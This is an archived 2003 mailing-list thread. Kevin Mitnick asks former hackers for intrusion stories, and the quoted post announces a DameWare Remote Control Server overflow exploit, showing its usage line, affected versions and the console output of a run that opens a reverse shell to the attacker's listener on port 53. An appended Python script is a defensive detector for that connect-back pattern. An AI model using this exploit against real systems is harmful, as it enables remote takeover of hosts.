RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit

From: Kevin Mitnick (kmitnick_at_defthi.com)
Date: 12/20/03

    To: "'Adik'" <netninja@hotmail.kg>, <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>
    Date: Fri, 19 Dec 2003 15:30:35 -0800

    Hi all!

    I'm sorry for my absence from the list for the past few months, but I have
    been very busy traveling outside the US, and my mail account was
    experiencing problems. Now that I am receiving the messages again, I have
    been playing "catch up," by reading the old posts.

    I do have some good news, and was hoping that some of you might be able to
    assist me. I have been commissioned by Wiley & Sons to write a second book,
    which is tentatively titled, "The Art of Intrusion." This book will
    chronicle detailed accounts of real, untold hacks by the perpetrators who
    did it, and I will provide a security analysis and describe how the attack
    could be mitigated/prevented in today's environment. I am going to tell the
    story from the perpetrator's stance, not just from research obtained from
    law enforcement officials and records.

    I am looking for former/retired hackers that would be willing to tell me the
    details of their sexiest hack. I am not interested in the run-of-the-mill
    attacks such as exploiting RPC DCOM, but rather creative ones that
    incorporated technical, physical and/or social engineering aspects.


    I am offering $500 for the most provocative story that makes it into the
    book, and if the person wishes, we can protect their anonymity by the use of
    a handle. All contributors selected for the book will receive a copy of
    both books autographed by the authors.

    I should have more information up on FreeKevin.com today, as well as
    DefensiveThinking.com. If someone would like to contact me with a story or
    a possible lead on a storyteller, please write to me at
    hacks@defensivethinking.com, or call at (310)689-7229. I would appreciate
    any assistance you can offer.

    All my best,


    Kevin Mitnick

    -----Original Message-----
    From: full-disclosure-admin@lists.netsys.com
    [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of Adik
    Sent: Friday, December 19, 2003 8:38 AM
    To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com
    Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server
    Overflow Exploit

    DameWare Mini Remote Control Server Exploit

    C:\xploits\dmware>dmware

            ...oO DameWare Remote Control Server Overflow Exploit Oo...

                    -( by Adik netmaniac[at]hotmail.KG )-

     - Versions vulnerable: <= DWRCS 3.72.0.0
     - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1

     Usage: dmware <TargetIP> <TargetPort> <YourIp> <YourPort>
     eg: dmware 10.0.0.1 6129 10.0.0.2 21

    C:\xploits\dmware>dmware 192.168.63.130 6129 192.168.63.1 53

            ...oO DameWare Remote Control Server Overflow Exploit Oo...

                    -( by Adik netmaniac[at]hotmail.KG )-

     - Versions vulnerable: <= DWRCS 3.72.0.0
     - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1

    [*] Target IP: 192.168.63.130 Port: 6129
    [*] Local IP: 192.168.63.1 Listening Port: 53

    [*] Initializing sockets... [ OK ]
    [*] Binding to local port: 53... [ OK ]
    [*] Setting up a listener... [ OK ]

     OS Info : WIN2000 [ver 5.0.2195]
     SP String : Service Pack 3

     EIP: 0x77db912b (advapi32.dll)

    [*] Constructing packet for WIN 2000 SP: 3... [ OK ]
    [*] Connecting to 192.168.63.130:6129... [ OK ]
    [*] Packet injected!
    [*] Connection request accepted: 192.168.63.130:1056
    [*] Dropping to shell...

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>exit
    exit
    [x] Connection closed.

    C:\xploits\dmware>

    ------
    cheerz,

    Adik

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
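The session output Adik quotes shows the shape a defender can key on: an inbound connection to the DWRCS listener on TCP/6129, followed within seconds by the same host opening a connection back to the very peer that just hit it (here on port 53, a port chosen to look like DNS). The script below, added here as an example and not part of the mailing-list post or of any DameWare tooling, correlates that pair over a constructed connection-log format. The log format, the sample lines, the 30-second window and all addresses are assumptions for illustration; only the 6129 listener port and the connect-back pattern come from the post.

```python
"""Flag DWRCS connect-back sessions: inbound to 6129, then a callback to the same peer.

Added example (not from the original post). Log format and sample lines are constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

DWRCS_PORT = 6129                 # DameWare Mini Remote Control Server listener (from the post)
CALLBACK_WINDOW = timedelta(seconds=30)  # assumed: max gap between the inbound hit and the callback


@dataclass
class Conn:
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int


def parse_line(line: str) -> Conn:
    """Parse one constructed log line:
    '2003-12-19T08:38:01 src=192.168.63.1:4000 dst=192.168.63.130:6129'"""
    ts_s, src_s, dst_s = line.split()
    src, sport = src_s[len("src="):].rsplit(":", 1)
    dst, dport = dst_s[len("dst="):].rsplit(":", 1)
    return Conn(datetime.fromisoformat(ts_s), src, int(sport), dst, int(dport))


def find_callbacks(lines):
    """Return one alert per inbound 6129 connection that is followed, within
    CALLBACK_WINDOW, by the DWRCS host connecting back to that same peer.
    Matching on the peer pair rather than on the callback port matters because
    the attacker picks the port (53 in the post) to blend in with normal traffic."""
    conns = sorted((parse_line(l) for l in lines if l.strip()), key=lambda c: c.ts)
    alerts = []
    for i, inbound in enumerate(conns):
        if inbound.dport != DWRCS_PORT:
            continue
        for later in conns[i + 1:]:
            if later.ts - inbound.ts > CALLBACK_WINDOW:
                break                      # log is time-sorted; nothing further can match
            if later.src == inbound.dst and later.dst == inbound.src:
                alerts.append({
                    "victim": inbound.dst,
                    "peer": inbound.src,
                    "callback_port": later.dport,
                    "delay_s": (later.ts - inbound.ts).total_seconds(),
                })
                break                      # one alert per inbound hit
    return alerts


# Constructed sample log: a benign admin session, the exploit session from the
# post (6129 hit, then callback to the attacker's port 53 two seconds later),
# an ordinary DNS lookup to a real resolver, and a stale connection outside the window.
SAMPLE_LOG = [
    "2003-12-19T08:30:00 src=10.0.0.5:3001 dst=192.168.63.130:6129",      # benign: no callback
    "2003-12-19T08:38:01 src=192.168.63.1:4000 dst=192.168.63.130:6129",  # exploit hits DWRCS
    "2003-12-19T08:38:02 src=192.168.63.130:1050 dst=10.0.0.53:53",       # normal DNS, not the peer
    "2003-12-19T08:38:03 src=192.168.63.130:1056 dst=192.168.63.1:53",    # callback to the peer
    "2003-12-19T08:45:00 src=192.168.63.130:1070 dst=10.0.0.5:445",       # too late to pair with 08:30
]


def demo():
    return find_callbacks(SAMPLE_LOG)


if __name__ == "__main__":
    for a in demo():
        print(f"[!] DWRCS connect-back: {a['victim']} -> {a['peer']}:{a['callback_port']} "
              f"after {a['delay_s']:.0f}s")
```

Run against a real firewall or NetFlow export, the same pairing logic applies after adapting parse_line to that format; the benign admin session at 08:30 and the DNS lookup at 08:38:02 show why the rule is anchored on the peer pair and the time window rather than on port 53 alone.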

